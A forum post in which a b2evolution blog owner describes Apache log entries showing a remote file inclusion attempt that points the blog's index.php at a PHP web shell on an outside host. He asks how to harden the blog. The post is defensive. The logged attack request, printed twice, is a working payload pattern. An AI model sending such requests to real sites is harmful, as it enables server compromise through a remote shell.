Recent Topics

1 Apr 24, 2009 08:01    

Upon examining my Apache access log, I came upon four(4) entries, similar to the one below, from the IP address 151.67.229.188 :

151.67.229.188 - - [23/Apr/2009:04:24:42 -0700] "GET /blog/index.php?lk=http://r00t32.altervista.org/shell.txt HTTP/1.1" 200 66005 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.1.4322; InfoPath.2)"

Upon blocking the IP address and sending an complaint to the ISP of the cracker, I proceeded to use the wget utility to download the shell.txt from the altervista.org nest.

Upon opening the shell.txt in my text editor, it can be seen (as I suspected based on other similar but less vicious attacks) that it is actually an PHP script with references to an cracker of the name:
* FullFreeez
* Panzera Security Blog and OpenCosmo Security Team

I did not notice failure entries in the Apache error log file; hence, though apparently the cracker successfully processed the files under attack (web server response 200), my b2evolution seems to have withstood the vicious hijacking attempt.

To confirm the previous, I recreated the attack against my blog site and all I could see is b2evolution displaying the usual unmodified content. However, I can not know if any data was sent to the cracker by the PHP script/shell shell.txt referenced above. Below is my Apache access log entry for my own attack recreation:

my.IP.addr.ess - - [23/Apr/2009:22:52:31 -0700] "GET /blog/index.php?lk=http://r00t32.altervista.org/shell.txt HTTP/1.1" 200 66005 "-" "Mozilla/5.0 (X11; U;
Linux i686; en; rv:1.9.0.8) Gecko/20080528 Epiphany/2.22 (Debian/2.24.3-2)"

Any other(s) of you have any comments/suggestions to enhance b2evolution security against these vicious crack attempts?


Form is loading...